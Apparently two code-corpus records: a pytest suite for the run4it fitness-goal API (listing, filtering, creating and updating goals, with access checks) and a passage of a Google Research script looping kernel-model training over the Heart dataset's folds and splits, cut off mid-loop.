a481427a0d1189a1f08c42e7ac1b452af6bbfc8d
|
[
"MIT"
] | null | null | null |
import pytest
import datetime as dt
from run4it.api.goal import ProfileGoalListResource, ProfileGoalResource, GoalCategoryModel, GoalModel
from .helpers import get_response_json, register_confirmed_user, register_and_login_confirmed_user, get_authorization_header
@pytest.mark.usefixtures('db')
class TestProfileGoalListResource:
def setup(self): # register some goals
cat1 = GoalCategoryModel('RunDistance', 'km')
cat1.save(commit=False)
cat2 = GoalCategoryModel('Weight target', 'kg')
cat2.save()
now = dt.datetime.utcnow()
future_goal = GoalModel(1, cat1, now + dt.timedelta(days=2), now + dt.timedelta(days=3), 0, 2, 0)
future_goal.save(commit=False)
active_goal1 = GoalModel(1, cat1, now + dt.timedelta(days=-2), now + dt.timedelta(days=1), 0, 2, 1)
active_goal2 = GoalModel(1, cat2, now + dt.timedelta(days=-2), now + dt.timedelta(days=2), 70, 68, 68)
active_goal1.save(commit=False)
active_goal2.save(commit=False)
expired_goal1 = GoalModel(1, cat1, now + dt.timedelta(days=-10), now + dt.timedelta(days=-2), 0, 2, 0) # incomplete
expired_goal2 = GoalModel(1, cat1, now + dt.timedelta(days=-8), now + dt.timedelta(days=-3), 0, 2, 2) # complete
expired_goal1.save(commit=False)
expired_goal2.save()
def test_content_type_is_json(self, api, client):
url = api.url_for(ProfileGoalListResource, username="jonny")
response = client.get(url)
assert(response.headers["Content-Type"] == 'application/json')
def test_get_goals_not_logged_in(self, api, client):
url = api.url_for(ProfileGoalListResource, username="jonny")
response = client.get(url)
response_json = get_response_json(response.data)
assert(response.status_code == 401)
assert(response_json["errors"]["auth"] is not None)
def test_get_goals_logged_in(self, api, client):
token,_ = register_and_login_confirmed_user(api, client, "jonny", "jonny@vikan.no", "jonny")
url = api.url_for(ProfileGoalListResource, username="jonny")
response = client.get(url, headers=get_authorization_header(token))
response_json = get_response_json(response.data)
assert(response.status_code == 200)
assert(len(response_json) == 2)
assert(response_json[0]['id'] == 2) #active goals is default
assert(response_json[1]['id'] == 3)
def test_get_goals_filter_active(self, api, client):
token,_ = register_and_login_confirmed_user(api, client, "jonny", "jonny@vikan.no", "jonny")
url = api.url_for(ProfileGoalListResource, username="jonny", filter="active")
response = client.get(url, headers=get_authorization_header(token))
response_json = get_response_json(response.data)
assert(response.status_code == 200)
assert(len(response_json) == 2)
assert(response_json[0]['id'] == 2)
assert(response_json[1]['id'] == 3)
def test_get_goals_filter_future(self, api, client):
token,_ = register_and_login_confirmed_user(api, client, "jonny", "jonny@vikan.no", "jonny")
url = api.url_for(ProfileGoalListResource, username="jonny", filter="future")
response = client.get(url, headers=get_authorization_header(token))
response_json = get_response_json(response.data)
assert(response.status_code == 200)
assert(len(response_json) == 1)
assert(response_json[0]['id'] == 1)
def test_get_goals_filter_expired(self, api, client):
token,_ = register_and_login_confirmed_user(api, client, "jonny", "jonny@vikan.no", "jonny")
url = api.url_for(ProfileGoalListResource, username="jonny", filter="expired")
response = client.get(url, headers=get_authorization_header(token))
response_json = get_response_json(response.data)
assert(response.status_code == 200)
assert(len(response_json) == 2)
assert(response_json[0]['id'] == 4)
assert(response_json[1]['id'] == 5)
def test_get_goals_filter_completed(self, api, client):
token,_ = register_and_login_confirmed_user(api, client, "jonny", "jonny@vikan.no", "jonny")
url = api.url_for(ProfileGoalListResource, username="jonny", filter="completed")
response = client.get(url, headers=get_authorization_header(token))
response_json = get_response_json(response.data)
assert(response.status_code == 200)
assert(len(response_json) == 1)
assert(response_json[0]['id'] == 5)
def test_get_goals_filter_incompleted(self, api, client):
token,_ = register_and_login_confirmed_user(api, client, "jonny", "jonny@vikan.no", "jonny")
url = api.url_for(ProfileGoalListResource, username="jonny", filter="incompleted")
response = client.get(url, headers=get_authorization_header(token))
response_json = get_response_json(response.data)
assert(response.status_code == 200)
assert(len(response_json) == 1)
assert(response_json[0]['id'] == 4)
def test_get_goals_duration(self, api, client):
token,_ = register_and_login_confirmed_user(api, client, "jonny", "jonny@vikan.no", "jonny")
url = api.url_for(ProfileGoalListResource, username="jonny", filter="incompleted")
response = client.get(url, headers=get_authorization_header(token))
response_json = get_response_json(response.data)
assert(response.status_code == 200)
assert(response_json[0]['duration'] == 8)
def test_get_goals_category(self, api, client):
token,_ = register_and_login_confirmed_user(api, client, "jonny", "jonny@vikan.no", "jonny")
url = api.url_for(ProfileGoalListResource, username="jonny", filter="incompleted")
response = client.get(url, headers=get_authorization_header(token))
response_json = get_response_json(response.data)
assert(response.status_code == 200)
assert(response_json[0]['categoryName'] == 'RunDistance')
assert(response_json[0]['categoryUnit'] == 'km')
def test_create_goal_not_logged_in(self, api, client):
url = api.url_for(ProfileGoalListResource, username="jonny")
response = client.post(url)
response_json = get_response_json(response.data)
assert(response.status_code == 401)
assert(response_json["errors"]["auth"] is not None)
def test_create_future_goal(self, api, client):
token,_ = register_and_login_confirmed_user(api, client, "creator", "creator@user.no", "pwd")
url = api.url_for(ProfileGoalListResource, username="creator")
datetime_start = dt.datetime.utcnow() + dt.timedelta(days=2)
startAt = datetime_start.strftime("%Y-%m-%dT%H:%M:%S+00:00")
duration = 4
endAt = (datetime_start + dt.timedelta(days=duration)).strftime("%Y-%m-%dT%H:%M:%S+00:00")
response = client.post(url, data={ "duration":duration, "startValue":11.2, "targetValue":23.4, "startAt": "{0}".format(startAt), "categoryID":1 }, headers=get_authorization_header(token))
response_json = get_response_json(response.data)
assert(response.status_code == 200)
assert(response_json["id"] == 6) # five created in setup
assert(response_json["startAt"] == startAt)
assert(response_json["endAt"] == endAt)
assert(response_json["duration"] == duration)
assert(response_json["startValue"] == 11.2)
assert(response_json["targetValue"] == 23.4)
assert(response_json["categoryName"] == "RunDistance")
assert(response_json["categoryUnit"] == "km")
assert(response.headers["Location"] == api.url_for(ProfileGoalResource, username="creator",goal_id=6, _external=True))
def test_create_ongoing_goal(self, api, client):
token,_ = register_and_login_confirmed_user(api, client, "creator", "creator@user.no", "pwd")
url = api.url_for(ProfileGoalListResource, username="creator")
datetime_start = dt.datetime.utcnow() - dt.timedelta(days=2)
startAt = datetime_start.strftime("%Y-%m-%dT%H:%M:%S+00:00")
duration = 4
endAt = (datetime_start + dt.timedelta(days=duration)).strftime("%Y-%m-%dT%H:%M:%S+00:00")
response = client.post(url, data={ "duration":duration, "startValue":11.2, "targetValue":23.4, "startAt": "{0}".format(startAt), "categoryID":1 }, headers=get_authorization_header(token))
response_json = get_response_json(response.data)
assert(response.status_code == 200)
assert(response_json["startAt"] == startAt)
assert(response_json["endAt"] == endAt)
assert(response_json["duration"] == duration)
def test_create_expired_goal(self, api, client):
token,_ = register_and_login_confirmed_user(api, client, "creator", "creator@user.no", "pwd")
url = api.url_for(ProfileGoalListResource, username="creator")
datetime_start = dt.datetime.utcnow() - dt.timedelta(days=6)
startAt = datetime_start.strftime("%Y-%m-%dT%H:%M:%S+00:00")
duration = 4
response = client.post(url, data={ "duration":duration, "startValue":11.2, "targetValue":23.4, "startAt": "{0}".format(startAt), "categoryID":1 }, headers=get_authorization_header(token))
response_json = get_response_json(response.data)
assert(response.status_code == 422)
assert(response_json["errors"]["goal"][0] == "Goal already expired")
def test_create_goal_with_startvalue_equal_to_target_value(self, api, client):
token,_ = register_and_login_confirmed_user(api, client, "creator", "creator@user.no", "pwd")
url = api.url_for(ProfileGoalListResource, username="creator")
datetime_start = dt.datetime.utcnow() + dt.timedelta(days=2)
startAt = datetime_start.strftime("%Y-%m-%dT%H:%M:%S+00:00")
duration = 4
response = client.post(url, data={ "duration":duration, "startValue":11.2, "targetValue":11.2, "startAt": "{0}".format(startAt), "categoryID":1 }, headers=get_authorization_header(token))
response_json = get_response_json(response.data)
assert(response.status_code == 422)
assert(response_json["errors"]["goal"][0] == "Goal target value equals start value")
def test_create_goal_with_nonexistant_category(self, api, client):
token,_ = register_and_login_confirmed_user(api, client, "creator", "creator@user.no", "pwd")
url = api.url_for(ProfileGoalListResource, username="creator")
datetime_start = dt.datetime.utcnow() + dt.timedelta(days=2)
startAt = datetime_start.strftime("%Y-%m-%dT%H:%M:%S+00:00")
duration = 4
response = client.post(url, data={ "duration":duration, "startValue":11.2, "targetValue":12.2, "startAt": "{0}".format(startAt), "categoryID":99 }, headers=get_authorization_header(token))
response_json = get_response_json(response.data)
assert(response.status_code == 422)
assert(response_json["errors"]["goal"][0] == "Goal category not found")
def test_create_goal_with_non_utc_startdate(self, api, client):
token,_ = register_and_login_confirmed_user(api, client, "creator", "creator@user.no", "pwd")
url = api.url_for(ProfileGoalListResource, username="creator")
now = dt.datetime.utcnow()
datetime_start = dt.datetime(now.year, now.month, now.day, tzinfo=dt.timezone(dt.timedelta(hours=2)))
startAt = datetime_start.strftime("%Y-%m-%dT%H:%M:%S%z")
utcStartAt = (datetime_start - datetime_start.utcoffset()).strftime("%Y-%m-%dT%H:%M:%S+00:00")
duration = 4
utcEndAt = (datetime_start - datetime_start.utcoffset() + dt.timedelta(days=duration)).strftime("%Y-%m-%dT%H:%M:%S+00:00")
response = client.post(url, data={ "duration":duration, "startValue":11.2, "targetValue":12.2, "startAt": "{0}".format(startAt), "categoryID":1 }, headers=get_authorization_header(token))
response_json = get_response_json(response.data)
assert(response.status_code == 200)
assert(response_json["startAt"] == utcStartAt)
assert(response_json["endAt"] == utcEndAt)
@pytest.mark.usefixtures('db')
class TestProfileGoalResource:
def setup(self): # register some goals
cat1 = GoalCategoryModel('RunDistance', 'km')
cat1.save(commit=False)
cat2 = GoalCategoryModel('CrawlDistance', 'm')
cat2.save()
now = dt.datetime.utcnow()
future_goal = GoalModel(1, cat1, now + dt.timedelta(days=2), now + dt.timedelta(days=3), 0, 2, 0)
future_goal.save(commit=False)
active_goal = GoalModel(1, cat1, now + dt.timedelta(days=-2), now + dt.timedelta(days=1), 0, 2, 1)
active_goal.save(commit=False)
expired_goal = GoalModel(1, cat1, now + dt.timedelta(days=-10), now + dt.timedelta(days=-2), 0, 2, 0)
expired_goal.save()
def test_content_type_is_json(self, api, client):
url = api.url_for(ProfileGoalResource, username="jonny", goal_id=1)
response = client.get(url)
assert(response.headers["Content-Type"] == 'application/json')
def test_get_goal_not_logged_in(self, api, client):
url = api.url_for(ProfileGoalResource, username="jonny", goal_id=1)
response = client.get(url)
response_json = get_response_json(response.data)
assert(response.status_code == 401)
assert(response_json["errors"]["auth"] is not None)
def test_get_goal_logged_in(self, api, client):
token,_ = register_and_login_confirmed_user(api, client, "jonny", "jonny@vikan.no", "jonny")
url = api.url_for(ProfileGoalResource, username="jonny", goal_id=2)
response = client.get(url, headers=get_authorization_header(token))
response_json = get_response_json(response.data)
assert(response.status_code == 200)
assert(response_json["id"] == 2)
def test_get_nonexistant_goal(self, api, client):
token,_ = register_and_login_confirmed_user(api, client, "jonny", "jonny@vikan.no", "jonny")
url = api.url_for(ProfileGoalResource, username="jonny", goal_id=99)
response = client.get(url, headers=get_authorization_header(token))
response_json = get_response_json(response.data)
assert(response.status_code == 404)
assert(response_json["errors"]["goal"] is not None)
def test_get_goal_for_another_user(self, api, client):
register_confirmed_user("test", "test@test.com", "pwd")
token,_ = register_and_login_confirmed_user(api, client, "jonny", "jonny@vikan.no", "jonny")
url = api.url_for(ProfileGoalResource, username="jonny", goal_id=2)
response = client.get(url, headers=get_authorization_header(token))
response_json = get_response_json(response.data)
assert(response.status_code == 404)
assert(response_json["errors"]["goal"] is not None)
def test_update_goal_not_logged_in(self, api, client):
url = api.url_for(ProfileGoalResource, username="jonny", goal_id=1)
response = client.put(url)
response_json = get_response_json(response.data)
assert(response.status_code == 401)
assert(response_json["errors"]["auth"] is not None)
def test_update_goal_for_another_user(self, api, client):
register_confirmed_user("test", "test@test.com", "pwd")
token,_ = register_and_login_confirmed_user(api, client, "jonny", "jonny@vikan.no", "jonny")
url = api.url_for(ProfileGoalResource, username="jonny", goal_id=2)
now = dt.datetime.utcnow()
newStartAt = now.strftime("%Y-%m-%dT%H:%M:%S+00:00")
newDuration = 1
response = client.put(url, data={ "duration":newDuration, "startValue":1.2, "targetValue":2.1, "startAt": "{0}".format(newStartAt), "categoryID":2 }, headers=get_authorization_header(token))
response_json = get_response_json(response.data)
assert(response.status_code == 422)
assert(response_json["errors"]["goal"] is not None)
def test_update_future_goal(self, api, client):
token,_ = register_and_login_confirmed_user(api, client, "jonny", "jonny@vikan.no", "jonny")
url = api.url_for(ProfileGoalResource, username="jonny", goal_id=1)
now = dt.datetime.utcnow()
newStartAt = now.strftime("%Y-%m-%dT%H:%M:%S+00:00")
newDuration = 1
newEndAt = (now + dt.timedelta(days=newDuration)).strftime("%Y-%m-%dT%H:%M:%S+00:00")
response = client.put(url, data={ "duration":newDuration, "startValue":1.2, "targetValue":2.1, "startAt": "{0}".format(newStartAt), "categoryID":2 }, headers=get_authorization_header(token))
response_json = get_response_json(response.data)
assert(response.status_code == 200)
assert(response_json["id"] == 1)
assert(response_json["startAt"] == newStartAt)
assert(response_json["endAt"] == newEndAt)
assert(response_json["duration"] == 1)
assert(response_json["startValue"] == 1.2)
assert(response_json["targetValue"] == 2.1)
assert(response_json["categoryName"] == "CrawlDistance")
assert(response_json["categoryUnit"] == "m")
def test_update_ongoing_goal(self, api, client):
token,_ = register_and_login_confirmed_user(api, client, "jonny", "jonny@vikan.no", "jonny")
url = api.url_for(ProfileGoalResource, username="jonny", goal_id=2)
now = dt.datetime.utcnow()
newStartAt = now.strftime("%Y-%m-%dT%H:%M:%S+00:00")
newDuration = 1
response = client.put(url, data={ "duration":newDuration, "startValue":1.2, "targetValue":2.1, "startAt": "{0}".format(newStartAt), "categoryID":2 }, headers=get_authorization_header(token))
response_json = get_response_json(response.data)
assert(response.status_code == 200)
assert(response_json["id"] == 2)
def test_update_expired_goal(self, api, client):
token,_ = register_and_login_confirmed_user(api, client, "jonny", "jonny@vikan.no", "jonny")
url = api.url_for(ProfileGoalResource, username="jonny", goal_id=3)
now = dt.datetime.utcnow()
newStartAt = now.strftime("%Y-%m-%dT%H:%M:%S+00:00")
newDuration = 1
response = client.put(url, data={ "duration":newDuration, "startValue":1.2, "targetValue":2.1, "startAt": "{0}".format(newStartAt), "categoryID":2 }, headers=get_authorization_header(token))
response_json = get_response_json(response.data)
assert(response.status_code == 422)
assert(response_json["errors"]["goal"][0] == "Goal already expired")
def test_update_goal_with_nonexisting_category(self, api, client):
token,_ = register_and_login_confirmed_user(api, client, "jonny", "jonny@vikan.no", "jonny")
url = api.url_for(ProfileGoalResource, username="jonny", goal_id=1)
now = dt.datetime.utcnow()
newStartAt = now.strftime("%Y-%m-%dT%H:%M:%S+00:00")
newDuration = 1
response = client.put(url, data={ "duration":newDuration, "startValue":1.2, "targetValue":2.1, "startAt": "{0}".format(newStartAt), "categoryID":22 }, headers=get_authorization_header(token))
response_json = get_response_json(response.data)
assert(response.status_code == 422)
assert(response_json["errors"]["goal"][0] == "Goal category not found")
def test_update_goal_with_non_utc_timestamp(self, api, client):
token,_ = register_and_login_confirmed_user(api, client, "jonny", "jonny@vikan.no", "jonny")
url = api.url_for(ProfileGoalResource, username="jonny", goal_id=1)
now = dt.datetime.utcnow()
datetime_start = dt.datetime(now.year, now.month, now.day, tzinfo=dt.timezone(dt.timedelta(hours=2)))
utcStartAt = (datetime_start - datetime_start.utcoffset()).strftime("%Y-%m-%dT%H:%M:%S+00:00")
new_duration = 3
utcEndAt = (datetime_start - datetime_start.utcoffset() + dt.timedelta(days=new_duration)).strftime("%Y-%m-%dT%H:%M:%S+00:00")
response = client.put(url, data={ "duration":new_duration, "startValue":1.2, "targetValue":2.2, "startAt": "{0}".format(utcStartAt), "categoryID":2 }, headers=get_authorization_header(token))
response_json = get_response_json(response.data)
assert(response.status_code == 200)
assert(response_json["startAt"] == utcStartAt)
assert(response_json["endAt"] == utcEndAt)
def test_update_goal_with_startvalue_equal_to_endvalue(self, api, client):
token,_ = register_and_login_confirmed_user(api, client, "jonny", "jonny@vikan.no", "jonny")
url = api.url_for(ProfileGoalResource, username="jonny", goal_id=1)
now = dt.datetime.utcnow()
newStartAt = now.strftime("%Y-%m-%dT%H:%M:%S+00:00")
newDuration = 1
response = client.put(url, data={ "duration":newDuration, "startValue":1.2, "targetValue":1.2, "startAt": "{0}".format(newStartAt), "categoryID":2 }, headers=get_authorization_header(token))
response_json = get_response_json(response.data)
assert(response.status_code == 422)
assert(response_json["errors"]["goal"] is not None)
def test_post_goal_not_supported(self, api, client):
url = api.url_for(ProfileGoalResource, username="jonny", goal_id=1)
response = client.post(url)
assert(response.status_code == 405) # not allowed
def test_delete_goal_not_supported(self, api, client):
url = api.url_for(ProfileGoalResource, username="jonny", goal_id=1)
response = client.delete(url)
assert(response.status_code == 405) # not allowed
| 54.98615
| 193
| 0.735466
| 2,751
| 19,850
| 5.095238
| 0.061796
| 0.09674
| 0.064208
| 0.027395
| 0.909253
| 0.876222
| 0.876079
| 0.868089
| 0.861383
| 0.851537
| 0
| 0.023451
| 0.104181
| 19,850
| 360
| 194
| 55.138889
| 0.764818
| 0.006448
| 0
| 0.714286
| 0
| 0
| 0.130827
| 0.021001
| 0
| 0
| 0
| 0
| 0.276398
| 1
| 0.10559
| false
| 0
| 0.012422
| 0
| 0.124224
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b810d7b14e79d097babae397b040fe60dce893e6
| 27,340
|
py
|
Python
|
On_Combining_Bags_to_Better_Learn_from_Label_Proportions/Code/PythCode/heartloops.py
|
gunpowder78/google-research
|
d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5
|
[
"Apache-2.0"
] | 1
|
2022-03-13T21:48:52.000Z
|
2022-03-13T21:48:52.000Z
|
On_Combining_Bags_to_Better_Learn_from_Label_Proportions/Code/PythCode/heartloops.py
|
gunpowder78/google-research
|
d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5
|
[
"Apache-2.0"
] | null | null | null |
On_Combining_Bags_to_Better_Learn_from_Label_Proportions/Code/PythCode/heartloops.py
|
gunpowder78/google-research
|
d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5
|
[
"Apache-2.0"
] | 1
|
2022-03-30T07:20:29.000Z
|
2022-03-30T07:20:29.000Z
|
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!/usr/bin/python
#
# Copyright 2021 The On Combining Bags to Better Learn from
# Label Proportions Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""LMMCM Loops for Heart Dataset."""
from pathlib import Path # pylint: disable=g-importing-member
import random
from models.kernel_model import * # pylint: disable=wildcard-import
import pandas as pd
import utils.bag_utils
import utils.data_utils
from utils.model_utils import * # pylint: disable=wildcard-import
rng = np.random.default_rng(6737749) # pylint: disable=undefined-variable
path_to_root_data_dir = (Path(__file__).parent / "../../Data/").resolve()
root_for_experiments = str(path_to_root_data_dir) + "/"
dataset_name = "Heart"
NUM_FEATURES = 14
name_dir = root_for_experiments + dataset_name + "/"
regularizer_param = 1e0
regularizer_param_string = "1e0"
class Helperdict(dict):
"""Helperdict class."""
def __key(self):
return tuple((m, self[m]) for m in sorted(self))
def __hash__(self):
return hash(self.__key())
def __eq__(self, other):
return self.__key() == other.__key() # pylint: disable=protected-access
for cluster_bags_method in range(1, 9):
if cluster_bags_method > 5:
cluster_bags_method_to_use = cluster_bags_method - 1
else:
cluster_bags_method_to_use = cluster_bags_method
cluster_bags_methodoutfile = name_dir + dataset_name + "_" + regularizer_param_string + "_MutConOutputClusterBags_" + str(
cluster_bags_method_to_use)
for foldnumber in range(1, 6):
folddir = name_dir + "Fold_" + str(foldnumber) + "/"
for splitnumber in range(1, 6):
splitdir = folddir + "Split_" + str(splitnumber) + "/"
testfile = splitdir + dataset_name + "_" + str(foldnumber) + "_" + str(
splitnumber) + "-test.csv"
cluster_dir = splitdir + "ClusterBags_" + str(
cluster_bags_method_to_use) + "/"
trainfile = cluster_dir + "full_train.csv"
random_seed = rng.integers(low=1000000, size=1)[0]
numpy_seed = rng.integers(low=1000000, size=1)[0]
if cluster_bags_method == 5:
continue
random.seed(random_seed)
np.random.seed(numpy_seed) # pylint: disable=undefined-variable
print()
print("*********starting************")
print(dataset_name + "_" + regularizer_param_string + "_Fold_" +
str(foldnumber) + "_Split_" + str(splitnumber))
print("random_seed = ", random_seed)
print("numpy_seed = ", numpy_seed)
list_of_features = []
for i in range(1, NUM_FEATURES):
list_of_features.append("x." + str(i))
list_of_features.append("constant")
full_train_df = pd.read_csv(trainfile)
test_df = pd.read_csv(testfile)
# print('experiment starts on %s' % data_path)
# experiment_start = time.time()
num_bags = len(pd.unique(full_train_df["bag"]))
if num_bags % 2 == 1:
bag_to_drop = random.choice(pd.unique(full_train_df["bag"]))
full_train_df = full_train_df[
full_train_df["bag"] != bag_to_drop].reset_index()
train_X = full_train_df[list_of_features].copy()
train_y = full_train_df["label"].copy()
test_X = test_df[list_of_features].copy()
test_y = test_df["label"].copy()
bag_id = full_train_df["bag"].to_numpy()
cont_col = list_of_features
prop_dict, size_dict = utils.bag_utils.compute_label_proportion(train_y,
bag_id)
print("train_X")
print(train_X.head(4).to_string())
print(train_X.tail(4).to_string())
print()
print("train_y")
print(train_y.head(4).to_string())
print(train_y.tail(4).to_string())
print()
print("test_X")
print(test_X.head(4).to_string())
print(test_X.tail(4).to_string())
print()
print("test_y")
print(test_y.head(4).to_string())
print(test_y.tail(4).to_string())
print()
print("bag_id")
print(bag_id)
print()
print("cont_col")
print(cont_col)
print()
print("cont_col")
print(cont_col)
print()
print("prop_dict")
print(prop_dict)
print()
print("size_dict")
print(size_dict)
# exit()
# set up parameters
KERNEL_PARAMS_direct_fixed = {
"kernel": "rbf",
"gamma": "scale",
"loss": LogisticLoss # pylint: disable=undefined-variable
}
options_direct_fixed = ("L-BFGS-B",
Helperdict({
"ftol": 1e-5,
"maxiter": 100,
"maxcor": 80
}))
TRAIN_PARAMS_direct_fixed = {
"method": options_direct_fixed,
"exclusion_param": 0
}
# initialize the model
model = KernelizedMethod( # pylint: disable=undefined-variable
**KERNEL_PARAMS_direct_fixed, regularizer=regularizer_param)
train_X_engineered, test_X_engineered = utils.data_utils.feature_engineering_cont(
train_X, test_X, cont_col)
print()
print("train_X_engineered")
print(train_X_engineered)
print(train_X_engineered.shape)
print()
print("test_X_engineered")
print(test_X_engineered)
print(test_X_engineered.shape)
# exit()
model.fit(train_X_engineered, test_X_engineered, test_y, bag_id,
prop_dict, size_dict, **TRAIN_PARAMS_direct_fixed)
pred = model.predict(test_X_engineered)
area, fprs, tprs, thresholds = model.get_roc(test_X_engineered, test_y)
print("auc = ", area)
results_string = (
dataset_name + "_" + regularizer_param_string + ", " +
str(cluster_bags_method_to_use) + ", " + str(splitnumber) + ", " +
str(foldnumber) + ", " + str(area) + "\n")
with open(cluster_bags_methodoutfile, "a") as fileto_append:
fileto_append.write(results_string)
rng = np.random.default_rng(74537984) # pylint: disable=undefined-variable
regularizer_param = 1e-1
regularizer_param_string = "1e-1"
for cluster_bags_method in range(1, 9):
if cluster_bags_method > 5:
cluster_bags_method_to_use = cluster_bags_method - 1
else:
cluster_bags_method_to_use = cluster_bags_method
cluster_bags_methodoutfile = name_dir + dataset_name + "_" + regularizer_param_string + "_MutConOutputClusterBags_" + str(
cluster_bags_method_to_use)
for foldnumber in range(1, 6):
folddir = name_dir + "Fold_" + str(foldnumber) + "/"
for splitnumber in range(1, 6):
splitdir = folddir + "Split_" + str(splitnumber) + "/"
testfile = splitdir + dataset_name + "_" + str(foldnumber) + "_" + str(
splitnumber) + "-test.csv"
cluster_dir = splitdir + "ClusterBags_" + str(
cluster_bags_method_to_use) + "/"
trainfile = cluster_dir + "full_train.csv"
random_seed = rng.integers(low=1000000, size=1)[0]
numpy_seed = rng.integers(low=1000000, size=1)[0]
if cluster_bags_method == 5:
continue
random.seed(random_seed)
np.random.seed(numpy_seed) # pylint: disable=undefined-variable
print()
print("*********starting************")
print(dataset_name + "_" + regularizer_param_string + "_Fold_" +
str(foldnumber) + "_Split_" + str(splitnumber))
print("random_seed = ", random_seed)
print("numpy_seed = ", numpy_seed)
list_of_features = []
for i in range(1, NUM_FEATURES):
list_of_features.append("x." + str(i))
list_of_features.append("constant")
full_train_df = pd.read_csv(trainfile)
test_df = pd.read_csv(testfile)
# print('experiment starts on %s' % data_path)
# experiment_start = time.time()
num_bags = len(pd.unique(full_train_df["bag"]))
if num_bags % 2 == 1:
bag_to_drop = random.choice(pd.unique(full_train_df["bag"]))
full_train_df = full_train_df[
full_train_df["bag"] != bag_to_drop].reset_index()
train_X = full_train_df[list_of_features].copy()
train_y = full_train_df["label"].copy()
test_X = test_df[list_of_features].copy()
test_y = test_df["label"].copy()
bag_id = full_train_df["bag"].to_numpy()
cont_col = list_of_features
prop_dict, size_dict = utils.bag_utils.compute_label_proportion(train_y,
bag_id)
print("train_X")
print(train_X.head(4).to_string())
print(train_X.tail(4).to_string())
print()
print("train_y")
print(train_y.head(4).to_string())
print(train_y.tail(4).to_string())
print()
print("test_X")
print(test_X.head(4).to_string())
print(test_X.tail(4).to_string())
print()
print("test_y")
print(test_y.head(4).to_string())
print(test_y.tail(4).to_string())
print()
print("bag_id")
print(bag_id)
print()
print("cont_col")
print(cont_col)
print()
print("cont_col")
print(cont_col)
print()
print("prop_dict")
print(prop_dict)
print()
print("size_dict")
print(size_dict)
# exit()
# set up parameters
KERNEL_PARAMS_direct_fixed = {
"kernel": "rbf",
"gamma": "scale",
"loss": LogisticLoss # pylint: disable=undefined-variable
}
options_direct_fixed = ("L-BFGS-B",
Helperdict({
"ftol": 1e-5,
"maxiter": 100,
"maxcor": 80
}))
TRAIN_PARAMS_direct_fixed = {
"method": options_direct_fixed,
"exclusion_param": 0
}
# initialize the model
model = KernelizedMethod( # pylint: disable=undefined-variable
**KERNEL_PARAMS_direct_fixed, regularizer=regularizer_param)
train_X_engineered, test_X_engineered = utils.data_utils.feature_engineering_cont(
train_X, test_X, cont_col)
print()
print("train_X_engineered")
print(train_X_engineered)
print(train_X_engineered.shape)
print()
print("test_X_engineered")
print(test_X_engineered)
print(test_X_engineered.shape)
# exit()
model.fit(train_X_engineered, test_X_engineered, test_y, bag_id,
prop_dict, size_dict, **TRAIN_PARAMS_direct_fixed)
pred = model.predict(test_X_engineered)
area, fprs, tprs, thresholds = model.get_roc(test_X_engineered, test_y)
print("auc = ", area)
results_string = (
dataset_name + "_" + regularizer_param_string + ", " +
str(cluster_bags_method_to_use) + ", " + str(splitnumber) + ", " +
str(foldnumber) + ", " + str(area) + "\n")
with open(cluster_bags_methodoutfile, "a") as fileto_append:
fileto_append.write(results_string)
rng = np.random.default_rng(938374) # pylint: disable=undefined-variable
regularizer_param = 1e-2
regularizer_param_string = "1e-2"
for cluster_bags_method in range(1, 9):
if cluster_bags_method > 5:
cluster_bags_method_to_use = cluster_bags_method - 1
else:
cluster_bags_method_to_use = cluster_bags_method
cluster_bags_methodoutfile = name_dir + dataset_name + "_" + regularizer_param_string + "_MutConOutputClusterBags_" + str(
cluster_bags_method_to_use)
for foldnumber in range(1, 6):
folddir = name_dir + "Fold_" + str(foldnumber) + "/"
for splitnumber in range(1, 6):
splitdir = folddir + "Split_" + str(splitnumber) + "/"
testfile = splitdir + dataset_name + "_" + str(foldnumber) + "_" + str(
splitnumber) + "-test.csv"
cluster_dir = splitdir + "ClusterBags_" + str(
cluster_bags_method_to_use) + "/"
trainfile = cluster_dir + "full_train.csv"
random_seed = rng.integers(low=1000000, size=1)[0]
numpy_seed = rng.integers(low=1000000, size=1)[0]
if cluster_bags_method == 5:
continue
random.seed(random_seed)
np.random.seed(numpy_seed) # pylint: disable=undefined-variable
print()
print("*********starting************")
print(dataset_name + "_" + regularizer_param_string + "_Fold_" +
str(foldnumber) + "_Split_" + str(splitnumber))
print("random_seed = ", random_seed)
print("numpy_seed = ", numpy_seed)
list_of_features = []
for i in range(1, NUM_FEATURES):
list_of_features.append("x." + str(i))
list_of_features.append("constant")
full_train_df = pd.read_csv(trainfile)
test_df = pd.read_csv(testfile)
# print('experiment starts on %s' % data_path)
# experiment_start = time.time()
num_bags = len(pd.unique(full_train_df["bag"]))
if num_bags % 2 == 1:
bag_to_drop = random.choice(pd.unique(full_train_df["bag"]))
full_train_df = full_train_df[
full_train_df["bag"] != bag_to_drop].reset_index()
train_X = full_train_df[list_of_features].copy()
train_y = full_train_df["label"].copy()
test_X = test_df[list_of_features].copy()
test_y = test_df["label"].copy()
bag_id = full_train_df["bag"].to_numpy()
cont_col = list_of_features
prop_dict, size_dict = utils.bag_utils.compute_label_proportion(train_y,
bag_id)
print("train_X")
print(train_X.head(4).to_string())
print(train_X.tail(4).to_string())
print()
print("train_y")
print(train_y.head(4).to_string())
print(train_y.tail(4).to_string())
print()
print("test_X")
print(test_X.head(4).to_string())
